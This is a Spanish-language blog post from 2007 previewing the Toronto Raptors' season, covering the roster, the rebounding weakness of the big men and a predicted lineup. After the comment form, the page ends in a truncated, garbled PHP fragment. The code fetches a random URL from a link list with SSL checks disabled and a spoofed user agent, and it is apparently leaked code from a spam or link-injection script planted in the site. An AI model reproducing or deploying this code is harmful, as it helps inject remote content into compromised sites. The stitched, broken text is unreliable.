Toronto Raptors: juego interior pobre con muchos jugadores altos

30 de October de 2007 por telekoman

bosh¿Será capaz Chris Bosh de liderar a su equipo en los Playoffs para conseguir pasar a segunda ronda? ¿Será capaz Toronto de igualar el juego y el resultado de la pasada fase regular? Ésas deberían ser las preguntas que cualquier aficionado de la franquicia canadiense se haga. Toronto es un equipo con poca experiencia NBA, tan sólo 3,6 años de media, y esto se nota forzosamente en Playoffs. Sin embargo, alguno de sus jugadores tienen mucha más experiencia en competición a alto nivel de lo que expresan sus números, caso de Garbajosa, Bargnani o Calderón, y eso también debe notarse durante la temporada regular.

La primera pregunta tiene difícil contestación. El año pasado, Chris Bosh, jugador franquicia de Toronto, tuvo una carga de responsabilidad excesiva sobre sus hombros y eso le hizo reducir mucho su rendimiento. La baja de Garbajosa, un falso rookie con mucha carrera a sus espaldas y que abre muy bien el campo, y la baja forma de Bargnani, número 1 del draft, recién salido de una apendicitis, hicieron que el juego interior se viera seriamente resentido. Sin jugadores que crearan espacios cerca del aro, Bosh se vio excesivamente defendido y eso posibilitó que los Nets, un equipo sin una clara referencia interior, fuera capaz de pasar por encima de los Raptors. Este año, con un equipo reforzado más en su línea exterior que en la interior, la pregunta podrá tener una respuesta afirmativa siempre que Bargnani y Garbajosa se mantengan fuera de la enfermería.

La segunda pregunta se puede responder mirando detenidamente la plantilla.

El puesto de base está bien cubierto. El base titular, T.J. Ford parece, por lo visto durante la pretemporada, que ha mejorado en una de las facetas en las que flojeaba, la dirección de juego. Ford ha sido más un shooting guard que un calderónpoint guard, un jugador capaz de anotar más que hacer que sus compañeros se muevan y anoten con facilidad. El segundo base, Jose Manuel Calderón, es el complemento perfecto a Ford, en el sentido de que hace mover al equipo con algo más de criterio, defiende muy agresivamente y es capaz de anotar, sin llegar a ser tan resolutivo en ataque como el teórico titular. Entre ambos deberían repartirse el 90% de los minutos de base del equipo, dejando el resto a Dixon.

La posición de escolta era la temporada pasada claramente para Anthony Parker, tercer anotador del equipo, acompañado de Morris Peterson, que este año ha firmado como agente libre por los Hornets. La incorporación al equipo de Carlos Delfino es una incógnita, ya que su carrera en Detroit no ha sido precisamente brillante. Se espera sin embargo que sea capaz de dar buenos minutos de descanso a Parker. Una posible variante que el entrenador de Toronto no utilizó la temporada pasada es la de poner en pista a los dos bases, Ford y Calderón, con el primero actuando como escolta.

 En la posición de tres, la de alero tirador, se ha fichado a Jason Kapono. El jugador proveniente de los Heat es un jugador interesante, capaz de anotar con relativa facilidad y que debe descargar en parte a Bargnani y Garbajosa de la responsabilidad de anotar desde fuera y permitir que éstos fortalezcan las posiciones interiores. Falta ver si realmente ambos, en especial Bargnani, son capaces de adaptarse a este tipo de juego.bargnani

Hasta aquí todo está bastante claro y las posiciones parecen bien cubiertas. En el momento en que se mira hacia la pintura es cuando aparecen las primeras dificultades.

El líder del equipo es, indiscutiblemente, Chris Bosh. Desde la posición de 4, lidera el equipo en puntos, rebotes tapones y minutos, pero debe evolucionar para ser capaz de liderar a su equipo también en Playoffs.

A su lado, y dejando atrás su temporada de rookie, Andrea Bargnani debe confirmarse como el gran jugador que todo el mundo ve en él y pasar a ser la segunda opción ofensiva del equipo, por encima de T.J. Ford. Sin embargo, Bargnani tiene una gran decisión que tomar esta temporada. La pasada temporada regular, el jugador italiano de 2,11 de altura fue el segundo jugador del equipo en número de triples intentados y en porcentaje de acierto en esta disciplina. Esto lleva a pensar que el joven italiano tiene alergia a la pintura, lo que se confirma cuando vemos que su media de rebotes es de sólo 3,9 rebotes por partido. Algo similar ocurre cuando miramos a otro de los hombres altos de Toronto, Jorge Garbajosa. Con algo más de tendencia reboteadora, Garbajosa destaca principalmente por su capacidad para adaptarse al juego, su habilidad para estar siempre donde tiene que estar y, sobre todo, por su experiencia y su aportación en los que comúnmente se denominan intangibles. Esta segunda temporada debe ser muy importante para ambos jugadores, que tienen un juego muy válido para Chris Bosh, ya que alejan de las posiciones defensivas a sus marcadores, crean espacios para tiros más fáciles, pero dificulta mucho el rebote en ataque. Toronto fue el tercer equipo menos reboteador la temporada pasada, y eso, en un equipo con tantos hombres altos, es difícil de admitir. El único pívot puro del equipo es Rasho Nesterovic, jugador de pocos recursos ofensivos pero que es capaz de fajarse en la pintura.

Con estos mimbres, las opciones de Sam Mitchell, elegido mejor entrenador la temporada pasada, son variadas. Puede optar por utilizar a Bargnani de 3 alto, Bosh de 4 y Nesterovic de center; por utilizar de 3 a Jason Kapono, con Bargnani de 4 y Garbajosa de 5 cuando haya que dar descanso a Bosh; o incluso alinear a Bosh, Bargnani y Garbajosa, con éstos últimos alternándose en las posiciones de 3 y 5. En casi todos los casos, Toronto será superado en rebotes, por lo que será necesario un buen acierto en el tiro.

Quinteto: T.J. Ford, Anthony Parker, Jason Kapono, Chris Bosh y Andrea Bargnani
Sexto Hombre: Jose Manuel Calderón / Jorge Garbajosa
Pronóstico: Segunda ronda de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>